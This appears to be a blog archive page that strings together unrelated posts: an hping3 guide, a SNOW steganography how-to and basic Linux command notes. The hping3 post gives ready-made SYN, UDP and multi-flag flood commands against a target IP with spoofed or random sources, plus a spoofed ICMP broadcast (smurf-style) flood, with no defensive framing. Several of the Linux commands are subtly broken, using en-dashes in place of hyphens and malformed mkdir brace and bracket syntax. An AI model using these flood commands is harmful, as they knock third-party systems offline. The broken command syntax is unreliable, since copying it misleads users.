Wednesday, March 25, 2015

Hping3 Usage and Tutorials

Open the console and go to the path of hping3 and give the following command.

hping3 --rand-source –S –L 0 –p <target port> <target IP>Here we are sending SYN packets (set value by replacing 0) with a random source.

hping3 --rand-source –SA –p <open port> <target IP>Here we are sending SYN + ACK packets from a random source.

hping3 --rand-source -–udp <target IP> --floodFlooding the target IP with UDP packets.

hping3 --rand-source –SAFRU –L 0 –M 0 –p <port> <target> --floodIn this command, we are sending SYN+ACK+FIN+RST+URG packets with TCP ack (-L) and TCP seq (-M). Change the values after -L and -M.

hping3 --icmp --spoof <target address> <broadcast address> --floodFlooding with ICMP packets by spoofed IP (--spoof).
Once you download the hping, open your console and type "hping3 --help" for more options.

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How to use SNOW tool for Hide Characters and Letters

STEP1  :  open notepad

STEP2 :   type helllo world 

STEP3 :  save file. as   readme.txt

STEP4: Now copy the snow tool to the c: drive and open command prompt.

STEP5: goto  c:\>snow 

STEP6 : snow -C -m "my swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt

STEP7:  your Text is now Hidden.

STEP8: to see the data  , type  the command Below.

snow -C -p "magic" readme.txt

Saturday, September 10, 2011

How to mount/unmount any media

How mount any media
[root@local host]# mount   /dev/cdrom   /mnt or media   (when we mount cd or DVD then gives this cmd)
[root@local host]# mount  /

How umount any media
[root@local host]# umount   /dev/cdrom   /mnt or media
[root@local host]# mount 


Ist user: - make a directory any way
[root@local host]# vi   /tmp/file name
Then comes on Find user and see that has power to delete this file .
Then come on
[root@local host]# chown   -R   username   /tmp/file name
To delete                                                                     
[root@local host]# rm  /tmp/file name
Pwd: - For ask current location.

Linux common commands

Show all file in Linux
[root@local hostname]# ll or ls
How to copy
[root@local host]# cp   dir 1/file name   dir 2
How to move file
[root@local host]# mv   dir1/file name dir2
To create five directory at a one time
[root@local host]# mkdir   naman {1, 2, 3,4,5}
Remove all directories
[root@local host]# rm  -rf    naman*
One name provide for all directory
[root@local host]# mkdir naman [1,5]
Create a three directory at a one time
[root@local host]#mkdir kamal {abc, bb, cc}

Remove all directories

[root@local host]# rm -rf  kamal*[a,b,c]
 To delete the directory which has any single last character?
[root@local host]# rm  -rf   kamal*[last char]